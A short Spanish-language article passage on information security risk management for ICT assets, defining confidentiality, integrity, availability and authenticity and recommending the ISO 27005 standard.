Las organizaciones podrían utilizar la misma metodología o enfoque que ya utilizan para otros tipos de gestión de activos y riesgos. Siempre que produzca resultados consistentes, válidos y comparables, funcionará perfectamente por motivos de seguridad y resiliencia.

Dicho esto, recuerde considerar los riesgos para la confidencialidad, integridad, disponibilidad y autenticidad de cada activo TIC:

  • Confidencialidad: El activo es accesible únicamente a personas autorizadas.
  • Integridad: El activo está protegido contra modificaciones, destrucción y pérdidas no autorizadas.
  • Disponibilidad: El activo está disponible para personas autorizadas cuando sea necesario.
  • Autenticidad: No se puede negar la validez del activo.

Es muy fácil olvidar que las violaciones de seguridad no necesariamente involucran a un atacante malicioso. Simplemente perder el acceso a un activo, por ejemplo, puede ser igual de problemático.

Para ayudar a superar estos desafíos específicos de seguridad, las organizaciones pueden encontrar útil hacer referencia a un estándar de mejores prácticas como ISO 27005, que ofrece orientación sobre la gestión de riesgos de seguridad de la información.

Fuente: IBM | ITGovernance | Ciberseguridad